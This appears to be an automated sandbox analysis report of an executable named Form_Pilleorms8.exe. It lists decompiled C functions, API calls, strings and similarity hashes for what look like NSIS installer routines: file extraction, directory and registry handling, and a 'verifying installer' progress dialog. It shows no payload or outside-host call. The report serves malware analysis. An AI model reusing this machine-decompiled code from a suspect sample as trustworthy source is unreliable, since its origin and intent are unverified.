
                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                        • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                        • CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                        • CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-4010320282
                        • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                        • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                        • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                        • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                        				long _v8;
                        				signed char _v12;
                        				unsigned int _v16;
                        				void* _v20;
                        				intOrPtr _v24;
                        				long _v56;
                        				void* _v60;
                        				long _t15;
                        				unsigned int _t19;
                        				signed int _t25;
                        				struct HWND__* _t28;
                        
                        				_t28 = _a4;
                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                        				if(_a8 == 0) {
                        					L4:
                        					_v56 = _t15;
                        					_v60 = 4;
                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                        					return _v24;
                        				}
                        				_t19 = GetMessagePos();
                        				_v16 = _t19 >> 0x10;
                        				_v20 = _t19;
                        				ScreenToClient(_t28,  &_v20);
                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                        				if((_v12 & 0x00000066) != 0) {
                        					_t15 = _v8;
                        					goto L4;
                        				}
                        				return _t25 | 0xffffffff;
                        			}














                        0x00404e62
                        0x00404e6f
                        0x00404e75
                        0x00404eb3
                        0x00404eb3
                        0x00404ec2
                        0x00404ec9
                        0x00000000
                        0x00404ecb
                        0x00404e77
                        0x00404e86
                        0x00404e8e
                        0x00404e91
                        0x00404ea3
                        0x00404ea9
                        0x00404eb0
                        0x00000000
                        0x00404eb0
                        0x00000000

                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                        • GetMessagePos.USER32 ref: 00404E77
                        • ScreenToClient.USER32 ref: 00404E91
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                        				short _v132;
                        				int _t11;
                        				int _t20;
                        
                        				if(_a8 == 0x110) {
                        					SetTimer(_a4, 1, 0xfa, 0);
                        					_a8 = 0x113;
                        				}
                        				if(_a8 == 0x113) {
                        					_t20 =  *0x41ea18; // 0x2e64a
                        					_t11 =  *0x42aa24;
                        					if(_t20 >= _t11) {
                        						_t20 = _t11;
                        					}
                        					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                        					SetWindowTextW(_a4,  &_v132);
                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                        				}
                        				return 0;
                        			}






                        0x00402fa3
                        0x00402fb1
                        0x00402fb7
                        0x00402fb7
                        0x00402fc5
                        0x00402fc7
                        0x00402fcd
                        0x00402fd4
                        0x00402fd6
                        0x00402fd6
                        0x00402fec
                        0x00402ffc
                        0x0040300e
                        0x0040300e
                        0x00403016

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • MulDiv.KERNEL32(0002E64A,00000064,?), ref: 00402FDC
                        • wsprintfW.USER32 ref: 00402FEC
                        • SetWindowTextW.USER32(?,?), ref: 00402FFC
                        • SetDlgItemTextW.USER32 ref: 0040300E
                        Strings
                        • verifying installer: %d%%, xrefs: 00402FE6
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: verifying installer: %d%%
                        • API String ID: 1451636040-82062127
                        • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                        • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                        • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                        • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E00402950(int __ebx, void* __eflags) {
                        				WCHAR* _t26;
                        				void* _t29;
                        				long _t37;
                        				int _t49;
                        				void* _t52;
                        				void* _t54;
                        				void* _t56;
                        				void* _t59;
                        				void* _t60;
                        				void* _t61;
                        
                        				_t49 = __ebx;
                        				_t52 = 0xfffffd66;
                        				_t26 = E00402DA6(0xfffffff0);
                        				_t55 = _t26;
                        				 *(_t61 - 0x40) = _t26;
                        				if(E00405E83(_t26) == 0) {
                        					E00402DA6(0xffffffed);
                        				}
                        				E00406008(_t55);
                        				_t29 = E0040602D(_t55, 0x40000000, 2);
                        				 *(_t61 + 8) = _t29;
                        				if(_t29 != 0xffffffff) {
                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                        					if( *(_t61 - 0x28) != _t49) {
                        						_t37 =  *0x434f14;
                        						 *(_t61 - 0x44) = _t37;
                        						_t54 = GlobalAlloc(0x40, _t37);
                        						if(_t54 != _t49) {
                        							E004034E5(_t49);
                        							E004034CF(_t54,  *(_t61 - 0x44));
                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                        							 *(_t61 - 0x10) = _t59;
                        							if(_t59 != _t49) {
                        								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                        								while( *_t59 != _t49) {
                        									_t60 = _t59 + 8;
                        									 *(_t61 - 0x3c) =  *_t59;
                        									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                        									_t59 = _t60 +  *(_t61 - 0x3c);
                        								}
                        								GlobalFree( *(_t61 - 0x10));
                        							}
                        							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                        							GlobalFree(_t54);
                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                        						}
                        					}
                        					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                        					CloseHandle( *(_t61 + 8));
                        				}
                        				_t56 = 0xfffffff3;
                        				if(_t52 < _t49) {
                        					_t56 = 0xffffffef;
                        					DeleteFileW( *(_t61 - 0x40));
                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                        				}
                        				_push(_t56);
                        				E00401423();
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                        				return 0;
                        			}













                        0x00402950
                        0x00402952
                        0x00402957
                        0x0040295c
                        0x0040295f
                        0x00402969
                        0x0040296d
                        0x0040296d
                        0x00402973
                        0x00402980
                        0x00402988
                        0x0040298b
                        0x00402997
                        0x0040299a
                        0x004029a0
                        0x004029ae
                        0x004029b3
                        0x004029b7
                        0x004029ba
                        0x004029c3
                        0x004029cf
                        0x004029d3
                        0x004029d6
                        0x004029e0
                        0x004029ff
                        0x004029ec
                        0x004029f4
                        0x004029f7
                        0x004029fc
                        0x004029fc
                        0x00402a06
                        0x00402a06
                        0x00402a13
                        0x00402a19
                        0x00402a1f
                        0x00402a1f
                        0x004029b7
                        0x00402a33
                        0x00402a35
                        0x00402a35
                        0x00402a3f
                        0x00402a40
                        0x00402a44
                        0x00402a48
                        0x00402a4e
                        0x00402a4e
                        0x00402a55
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                        • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                        • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                        • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405A6E(WCHAR* _a4) {
                        				struct _SECURITY_ATTRIBUTES _v16;
                        				struct _SECURITY_DESCRIPTOR _v36;
                        				long _t23;
                        
                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                        				_v36.Owner = 0x4083f8;
                        				_v36.Group = 0x4083f8;
                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                        				_v16.lpSecurityDescriptor =  &_v36;
                        				_v36.Revision = 1;
                        				_v36.Control = 4;
                        				_v36.Dacl = 0x4083e8;
                        				_v16.nLength = 0xc;
                        				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                        					L1:
                        					return 0;
                        				}
                        				_t23 = GetLastError();
                        				if(_t23 == 0xb7) {
                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                        						goto L1;
                        					}
                        					return GetLastError();
                        				}
                        				return _t23;
                        			}






                        0x00405a79
                        0x00405a7d
                        0x00405a80
                        0x00405a86
                        0x00405a8a
                        0x00405a8e
                        0x00405a96
                        0x00405a9d
                        0x00405aa3
                        0x00405aaa
                        0x00405ab9
                        0x00405abb
                        0x00000000
                        0x00405abb
                        0x00405ac5
                        0x00405acc
                        0x00405ae2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405ae4
                        0x00405ae8

                        APIs
                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                        • GetLastError.KERNEL32 ref: 00405AC5
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                        • GetLastError.KERNEL32 ref: 00405AE4
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3081826266
                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                        • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                        • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                        				void* _v8;
                        				int _v12;
                        				short _v536;
                        				void* _t27;
                        				signed int _t33;
                        				intOrPtr* _t35;
                        				signed int _t45;
                        				signed int _t46;
                        				signed int _t47;
                        
                        				_t46 = _a12;
                        				_t47 = _t46 & 0x00000300;
                        				_t45 = _t46 & 0x00000001;
                        				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                        				if(_t27 == 0) {
                        					if((_a12 & 0x00000002) == 0) {
                        						L3:
                        						_push(0x105);
                        						_push( &_v536);
                        						_push(0);
                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                        							__eflags = _t45;
                        							if(__eflags != 0) {
                        								L10:
                        								RegCloseKey(_v8);
                        								return 0x3eb;
                        							}
                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                        							__eflags = _t33;
                        							if(_t33 != 0) {
                        								break;
                        							}
                        							_push(0x105);
                        							_push( &_v536);
                        							_push(_t45);
                        						}
                        						RegCloseKey(_v8);
                        						_t35 = E0040690A(3);
                        						if(_t35 != 0) {
                        							return  *_t35(_a4, _a8, _t47, 0);
                        						}
                        						return RegDeleteKeyW(_a4, _a8);
                        					}
                        					_v12 = 0;
                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                        						goto L10;
                        					}
                        					goto L3;
                        				}
                        				return _t27;
                        			}












                        0x00402eb4
                        0x00402ebd
                        0x00402ec6
                        0x00402ed2
                        0x00402edb
                        0x00402ee5
                        0x00402f0a
                        0x00402f10
                        0x00402f15
                        0x00402f16
                        0x00402f46
                        0x00402f1f
                        0x00402f21
                        0x00402f71
                        0x00402f74
                        0x00000000
                        0x00402f7a
                        0x00402f30
                        0x00402f35
                        0x00402f37
                        0x00000000
                        0x00000000
                        0x00402f3f
                        0x00402f44
                        0x00402f45
                        0x00402f45
                        0x00402f52
                        0x00402f5a
                        0x00402f61
                        0x00000000
                        0x00402f8a
                        0x00000000
                        0x00402f69
                        0x00402ef5
                        0x00402f08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f08
                        0x00402f90

                        APIs
                        • RegEnumValueW.ADVAPI32 ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                        • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                        • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                        • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
                        				struct HWND__* _t30;
                        				WCHAR* _t38;
                        				void* _t48;
                        				void* _t53;
                        				signed int _t55;
                        				signed int _t60;
                        				long _t63;
                        				void* _t65;
                        
                        				_t53 = __ebx;
                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                        				} else {
                        					E00402D84(2);
                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                        				}
                        				_t55 =  *(_t65 - 0x24);
                        				 *(_t65 + 8) = _t30;
                        				_t60 = _t55 & 0x00000004;
                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                        				if((_t55 & 0x00010000) == 0) {
                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                        				} else {
                        					_t38 = E00402DA6(0x11);
                        				}
                        				 *(_t65 - 0x44) = _t38;
                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                        				asm("sbb esi, esi");
                        				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                        					DeleteObject(_t48);
                        				}
                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                        					_push(_t63);
                        					E00406484();
                        				}
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                        				return 0;
                        			}











                        0x00401d81
                        0x00401d85
                        0x00401d9a
                        0x00401d87
                        0x00401d89
                        0x00401d8f
                        0x00401d8f
                        0x00401da0
                        0x00401da3
                        0x00401dad
                        0x00401db0
                        0x00401db8
                        0x00401dc9
                        0x00401dcc
                        0x00401dd7
                        0x00401dce
                        0x00401dd0
                        0x00401dd0
                        0x00401ddb
                        0x00401de5
                        0x00401e0c
                        0x00401e1b
                        0x00401e29
                        0x00401e31
                        0x00401e39
                        0x00401e39
                        0x00401e42
                        0x00401e48
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                        • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                        • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                        • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
                        				void* __edi;
                        				int _t9;
                        				signed char _t15;
                        				struct HFONT__* _t18;
                        				intOrPtr _t30;
                        				void* _t31;
                        				struct HDC__* _t33;
                        				void* _t35;
                        
                        				_t30 = __edx;
                        				_t33 = GetDC( *(_t35 - 8));
                        				_t9 = E00402D84(2);
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                        				ReleaseDC( *(_t35 - 8), _t33);
                        				 *0x40ce00 = E00402D84(3);
                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				 *0x40ce07 = 1;
                        				 *0x40ce04 = _t15 & 0x00000001;
                        				 *0x40ce05 = _t15 & 0x00000002;
                        				 *0x40ce06 = _t15 & 0x00000004;
                        				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                        				_t18 = CreateFontIndirectW(0x40cdf0);
                        				_push(_t18);
                        				_push(_t31);
                        				E00406484();
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                        				return 0;
                        			}











                        0x00401e4e
                        0x00401e59
                        0x00401e5b
                        0x00401e68
                        0x00401e7f
                        0x00401e84
                        0x00401e91
                        0x00401e96
                        0x00401e9a
                        0x00401ea5
                        0x00401eac
                        0x00401ebe
                        0x00401ec4
                        0x00401ec9
                        0x00401ed3
                        0x00402638
                        0x0040156d
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
